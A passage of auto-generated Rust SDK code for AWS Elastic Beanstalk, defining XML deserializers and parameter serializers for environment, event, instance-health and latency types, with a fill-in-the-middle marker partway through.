try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentInfoDescriptionList = Vec<EnvironmentInfoDescription>; struct EnvironmentInfoDescriptionListDeserializer; impl EnvironmentInfoDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentInfoDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type EnvironmentInfoType = String; struct EnvironmentInfoTypeDeserializer; impl EnvironmentInfoTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A link to another environment, defined in the environment's manifest. Links provide connection information in system properties that can be used to connect to another environment in the same group. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentLink { #[doc="<p>The name of the linked environment (the dependency).</p>"] pub environment_name: Option<String>, #[doc="<p>The name of the link.</p>"] pub link_name: Option<String>, } struct EnvironmentLinkDeserializer; impl EnvironmentLinkDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentLink, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentLink::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "EnvironmentName" => { obj.environment_name = Some(try!(StringDeserializer::deserialize("EnvironmentName", stack))); } "LinkName" => { obj.link_name = Some(try!(StringDeserializer::deserialize("LinkName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentLinks = Vec<EnvironmentLink>; struct EnvironmentLinksDeserializer; impl EnvironmentLinksDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentLinks, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentLinkDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type EnvironmentName = String; struct EnvironmentNameDeserializer; impl EnvironmentNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentNamesList = Vec<EnvironmentName>; /// Serialize `EnvironmentNamesList` contents to a `SignedRequest`. struct EnvironmentNamesListSerializer; impl EnvironmentNamesListSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentNamesList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>Describes the AWS resources in use by this environment. This data is live.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourceDescription { #[doc="<p> The <code>AutoScalingGroups</code> used by this environment. </p>"] pub auto_scaling_groups: Option<AutoScalingGroupList>, #[doc="<p>The name of the environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The Amazon EC2 instances used by this environment.</p>"] pub instances: Option<InstanceList>, #[doc="<p>The Auto Scaling launch configurations in use by this environment.</p>"] pub launch_configurations: Option<LaunchConfigurationList>, #[doc="<p>The LoadBalancers in use by this environment.</p>"] pub load_balancers: Option<LoadBalancerList>, #[doc="<p>The queues used by this environment.</p>"] pub queues: Option<QueueList>, #[doc="<p>The <code>AutoScaling</code> triggers in use by this environment. </p>"] pub triggers: Option<TriggerList>, } struct EnvironmentResourceDescriptionDeserializer; impl EnvironmentResourceDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourceDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourceDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "AutoScalingGroups" => { obj.auto_scaling_groups = Some(try!(AutoScalingGroupListDeserializer::deserialize("AutoScalingGroups", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "Instances" => { obj.instances = Some(try!(InstanceListDeserializer::deserialize("Instances", stack))); } "LaunchConfigurations" => { obj.launch_configurations = Some(try!(LaunchConfigurationListDeserializer::deserialize("LaunchConfigurations", stack))); } "LoadBalancers" => { obj.load_balancers = Some(try!(LoadBalancerListDeserializer::deserialize("LoadBalancers", stack))); } "Queues" => { obj.queues = Some(try!(QueueListDeserializer::deserialize("Queues", stack))); } "Triggers" => { obj.triggers = Some(try!(TriggerListDeserializer::deserialize("Triggers", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message containing a list of environment resource descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourceDescriptionsMessage { #[doc="<p> A list of <a>EnvironmentResourceDescription</a>. </p>"] pub environment_resources: Option<EnvironmentResourceDescription>, } struct EnvironmentResourceDescriptionsMessageDeserializer; impl EnvironmentResourceDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourceDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourceDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "EnvironmentResources" => { obj.environment_resources = Some(try!(EnvironmentResourceDescriptionDeserializer::deserialize("EnvironmentResources", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the AWS resources in use by this environment. This data is not live data.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourcesDescription { #[doc="<p>Describes the LoadBalancer.</p>"] pub load_balancer: Option<LoadBalancerDescription>, } struct EnvironmentResourcesDescriptionDeserializer; impl EnvironmentResourcesDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourcesDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourcesDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "LoadBalancer" => { obj.load_balancer = Some(try!(LoadBalancerDescriptionDeserializer::deserialize("LoadBalancer", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentStatus = String; struct EnvironmentStatusDeserializer; impl EnvironmentStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an environment tier</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentTier { #[doc="<p>The name of this environment tier.</p>"] pub name: Option<String>, #[doc="<p>The type of this environment tier.</p>"] pub type_: Option<String>, #[doc="<p>The version of this environment tier.</p>"] pub version: Option<String>, } struct EnvironmentTierDeserializer; impl EnvironmentTierDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentTier, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentTier::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(StringDeserializer::deserialize("Name", stack))); } "Type" => { obj.type_ = Some(try!(StringDeserializer::deserialize("Type", stack))); } "Version" => { obj.version = Some(try!(StringDeserializer::deserialize("Version", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `EnvironmentTier` contents to a `SignedRequest`. struct EnvironmentTierSerializer; impl EnvironmentTierSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentTier) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.name { params.put(&format!("{}{}", prefix, "Name"), &field_value); } if let Some(ref field_value) = obj.type_ { params.put(&format!("{}{}", prefix, "Type"), &field_value); } if let Some(ref field_value) = obj.version { params.put(&format!("{}{}", prefix, "Version"), &field_value); } } } pub type EventDate = String; struct EventDateDeserializer; impl EventDateDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDate, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes an event.</p>"] #[derive(Default,Debug,Clone)] pub struct EventDescription { #[doc="<p>The application associated with the event.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the environment associated with this event.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The date when the event occurred.</p>"] pub event_date: Option<EventDate>, #[doc="<p>The event message.</p>"] pub message: Option<EventMessage>, #[doc="<p>The web service request ID for the activity of this event.</p>"] pub request_id: Option<RequestId>, #[doc="<p>The severity level of this event.</p>"] pub severity: Option<EventSeverity>, #[doc="<p>The name of the configuration associated with this event.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>The release label for the application version associated with this event.</p>"] pub version_label: Option<VersionLabel>, } struct EventDescriptionDeserializer; impl EventDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EventDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "EventDate" => { obj.event_date = Some(try!(EventDateDeserializer::deserialize("EventDate", stack))); } "Message" => { obj.message = Some(try!(EventMessageDeserializer::deserialize("Message", stack))); } "RequestId" => { obj.request_id = Some(try!(RequestIdDeserializer::deserialize("RequestId", stack))); } "Severity" => { obj.severity = Some(try!(EventSeverityDeserializer::deserialize("Severity", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } "VersionLabel" => { obj.version_label = Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventDescriptionList = Vec<EventDescription>; struct EventDescriptionListDeserializer;<|fim▁hole|> impl EventDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EventDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message wrapping a list of event descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EventDescriptionsMessage { #[doc="<p> A list of <a>EventDescription</a>. </p>"] pub events: Option<EventDescriptionList>, #[doc="<p> If returned, this indicates that there are more results to obtain. Use this token in the next <a>DescribeEvents</a> call to get the next batch of events. </p>"] pub next_token: Option<Token>, } struct EventDescriptionsMessageDeserializer; impl EventDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EventDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Events" => { obj.events = Some(try!(EventDescriptionListDeserializer::deserialize("Events", stack))); } "NextToken" => { obj.next_token = Some(try!(TokenDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventMessage = String; struct EventMessageDeserializer; impl EventMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventMessage, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventSeverity = String; struct EventSeverityDeserializer; impl EventSeverityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventSeverity, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ExceptionMessage = String; pub type FailureType = String; struct FailureTypeDeserializer; impl FailureTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<FailureType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type FileTypeExtension = String; struct FileTypeExtensionDeserializer; impl FileTypeExtensionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<FileTypeExtension, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ForceTerminate = bool; pub type GroupName = String; pub type IncludeDeleted = bool; pub type IncludeDeletedBackTo = String; #[doc="<p>The description of an Amazon EC2 instance.</p>"] #[derive(Default,Debug,Clone)] pub struct Instance { #[doc="<p>The ID of the Amazon EC2 instance.</p>"] pub id: Option<ResourceId>, } struct InstanceDeserializer; impl InstanceDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Instance, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Instance::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Id" => { obj.id = Some(try!(ResourceIdDeserializer::deserialize("Id", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceHealthList = Vec<SingleInstanceHealth>; struct InstanceHealthListDeserializer; impl InstanceHealthListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceHealthList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SingleInstanceHealthDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Represents summary information about the health of an instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct InstanceHealthSummary { #[doc="<p> <b>Red.</b> The health agent is reporting a high number of request failures or other issues for an instance or environment.</p>"] pub degraded: Option<NullableInteger>, #[doc="<p> <b>Green.</b> An operation is in progress on an instance.</p>"] pub info: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> AWS Elastic Beanstalk and the health agent are reporting no data on an instance.</p>"] pub no_data: Option<NullableInteger>, #[doc="<p> <b>Green.</b> An instance is passing health checks and the health agent is not reporting any problems.</p>"] pub ok: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> An operation is in progress on an instance within the command timeout.</p>"] pub pending: Option<NullableInteger>, #[doc="<p> <b>Red.</b> The health agent is reporting a very high number of request failures or other issues for an instance or environment.</p>"] pub severe: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> AWS Elastic Beanstalk and the health agent are reporting an insufficient amount of data on an instance.</p>"] pub unknown: Option<NullableInteger>, #[doc="<p> <b>Yellow.</b> The health agent is reporting a moderate number of request failures or other issues for an instance or environment.</p>"] pub warning: Option<NullableInteger>, } struct InstanceHealthSummaryDeserializer; impl InstanceHealthSummaryDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceHealthSummary, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = InstanceHealthSummary::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Degraded" => { obj.degraded = Some(try!(NullableIntegerDeserializer::deserialize("Degraded", stack))); } "Info" => { obj.info = Some(try!(NullableIntegerDeserializer::deserialize("Info", stack))); } "NoData" => { obj.no_data = Some(try!(NullableIntegerDeserializer::deserialize("NoData", stack))); } "Ok" => { obj.ok = Some(try!(NullableIntegerDeserializer::deserialize("Ok", stack))); } "Pending" => { obj.pending = Some(try!(NullableIntegerDeserializer::deserialize("Pending", stack))); } "Severe" => { obj.severe = Some(try!(NullableIntegerDeserializer::deserialize("Severe", stack))); } "Unknown" => { obj.unknown = Some(try!(NullableIntegerDeserializer::deserialize("Unknown", stack))); } "Warning" => { obj.warning = Some(try!(NullableIntegerDeserializer::deserialize("Warning", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceId = String; struct InstanceIdDeserializer; impl InstanceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceList = Vec<Instance>; struct InstanceListDeserializer; impl InstanceListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(InstanceDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type InstancesHealthAttribute = String; pub type InstancesHealthAttributes = Vec<InstancesHealthAttribute>; /// Serialize `InstancesHealthAttributes` contents to a `SignedRequest`. struct InstancesHealthAttributesSerializer; impl InstancesHealthAttributesSerializer { fn serialize(params: &mut Params, name: &str, obj: &InstancesHealthAttributes) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } pub type Integer = i64; struct IntegerDeserializer; impl IntegerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Integer, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Represents the average latency for the slowest X percent of requests over the last 10 seconds.</p>"] #[derive(Default,Debug,Clone)] pub struct Latency { #[doc="<p>The average latency for the slowest 90 percent of requests over the last 10 seconds.</p>"] pub p10: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 50 percent of requests over the last 10 seconds.</p>"] pub p50: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 25 percent of requests over the last 10 seconds.</p>"] pub p75: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 15 percent of requests over the last 10 seconds.</p>"] pub p85: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 10 percent of requests over the last 10 seconds.</p>"] pub p90: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 5 percent of requests over the last 10 seconds.</p>"] pub p95: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 1 percent of requests over the last 10 seconds.</p>"] pub p99: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 0.1 percent of requests over the last 10 seconds.</p>"] pub p999: Option<NullableDouble>, } struct LatencyDeserializer; impl LatencyDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Latency, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Latency::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "P10" => { obj.p10 = Some(try!(NullableDoubleDeserializer::deserialize("P10", stack))); } "P50" => { obj.p50 = Some(try!(NullableDoubleDeserializer::deserialize("P50", stack))); } "P75" => { obj.p75 = Some(try!(NullableDoubleDeserializer::deserialize("P75", stack))); } "P85" => { obj.p85 = Some(try!(NullableDoubleDeserializer::deserialize("P85", stack))); } "P90" => { obj.p90 = Some(try!(NullableDoubleDeserializer::deserialize("P90", stack))); } "P95" => { obj.p95 = Some(try!(NullableDoubleDeserializer::deserialize("P95", stack))); } "P99" => { obj.p99 = Some(try!(NullableDoubleDeserializer::deserialize("P99", stack))); } "P999" => { obj.p999 = Some(try!(NullableDoubleDeserializer::deserialize("P999", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes an Auto Scaling launch configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct LaunchConfiguration { #[doc="<p>The name of the launch configuration.</p>"] pub name: Option<ResourceId>, } struct LaunchConfigurationDeserializer; impl LaunchConfigurationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchConfiguration, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LaunchConfiguration::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LaunchConfigurationList = Vec<LaunchConfiguration>; struct LaunchConfigurationListDeserializer; impl LaunchConfigurationListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchConfigurationList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LaunchConfigurationDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LaunchedAt = String; struct LaunchedAtDeserializer; impl LaunchedAtDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LaunchedAt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A list of available AWS Elastic Beanstalk solution stacks.</p>"] #[derive(Default,Debug,Clone)] pub struct ListAvailableSolutionStacksResultMessage { #[doc="<p> A list of available solution stacks and their <a>SolutionStackDescription</a>. </p>"] pub solution_stack_details: Option<AvailableSolutionStackDetailsList>, #[doc="<p>A list of available solution stacks.</p>"] pub solution_stacks: Option<AvailableSolutionStackNamesList>, } struct ListAvailableSolutionStacksResultMessageDeserializer; impl ListAvailableSolutionStacksResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ListAvailableSolutionStacksResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ListAvailableSolutionStacksResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "SolutionStackDetails" => { obj.solution_stack_details = Some(try!(AvailableSolutionStackDetailsListDeserializer::deserialize("SolutionStackDetails", stack))); } "SolutionStacks" => { obj.solution_stacks = Some(try!(AvailableSolutionStackNamesListDeserializer::deserialize("SolutionStacks", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of a Listener for the LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct Listener { #[doc="<p>The port that is used by the Listener.</p>"] pub port: Option<Integer>, #[doc="<p>The protocol that is 